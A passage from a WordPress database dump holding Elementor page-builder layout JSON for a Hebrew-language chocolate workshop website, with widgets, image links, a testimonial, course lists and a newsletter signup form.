\\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(351,87,'_elementor_version','0.4'),(353,88,'_wp_page_template','elementor_canvas'),(354,88,'_elementor_edit_mode','builder'),(355,88,'_elementor_template_type','post'),(356,88,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans 